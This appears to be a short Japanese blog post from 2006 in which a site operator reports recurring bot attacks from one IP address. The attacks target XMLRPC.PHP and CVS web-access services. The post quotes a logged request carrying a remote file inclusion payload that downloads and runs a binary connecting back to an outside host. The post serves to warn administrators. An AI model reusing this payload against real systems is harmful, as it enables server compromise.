ずっと以前から217.96.23.43からXMLRPC.PHPの古い脆弱性を狙ったBot侵入アクセスが繰り返されていましたが、最近オープンソース開発コミュニティでよく使われているCVS WEB ACCESSサービスの脆弱性を狙った手口も使っているようです。

217.96.23.43 - - [15/Jan/2006:20:25:21 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUE
ST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.2
03.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1" 404 297
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

CVS repositoryへのWeb accessサービスを提供しているサイトは要チェックかも。

少なくとも217.96.23.43からのアクセスをブロックする必要はあると思います。ほとんど毎日やってきますから。